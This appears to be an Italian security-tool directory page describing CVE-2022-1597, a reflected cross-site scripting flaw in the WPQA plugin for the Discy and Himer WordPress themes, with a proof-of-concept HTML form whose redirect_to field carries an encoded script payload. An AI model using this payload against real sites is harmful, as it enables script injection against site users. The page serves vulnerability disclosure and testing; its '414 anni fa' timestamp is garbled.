Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-1597 — Il plugin, utilizzato come complemento per i temi Discy e Himer, non pulisce e non escape un parametro nel suo modulo di reimpostazione della password, il che rende possibile effettuare attacchi di Cross-Site Scripting Riflesso. | Kitploit
Strumenti/GitHubGitHub/v35hr4j/cve-2022-1597
Strumenti di PhishingScanner di Vulnerabilità WebAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubv35hr4j/cve-2022-1597

CVE-2022-1597

Il plugin, utilizzato come complemento per i temi Discy e Himer, non pulisce e non escape un parametro nel suo modulo di reimpostazione della password, il che rende possibile effettuare attacchi di Cross-Site Scripting Riflesso.

Vedi Repository
414 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-1597

Il plugin, utilizzato come companion per i temi Discy e Himer, non sanifica e non esegue l'escape di un parametro nel suo modulo di reimpostazione della password, rendendo possibile eseguire attacchi di Cross-Site Scripting Riflesso

Plugin interessati:

WPQA < 5.4

Temi interessati:

DISCY

HIMER

POC:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="user&#95;mail" value="[email protected]" />
      <input type="hidden" name="form&#95;type" value="wpqa&#95;forget" />
      <input type="hidden" name="action" value="wpqa&#95;ajax&#95;password&#95;process" />
      <input type="hidden" name="redirect&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Template Nuclei:

CVE-2022-1597.yaml

NUCLEI

VIDEO POC:

https://www.youtube.com/watch?v=E2GRtf6prq8

Riferimenti:

https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597

Scarica lo strumento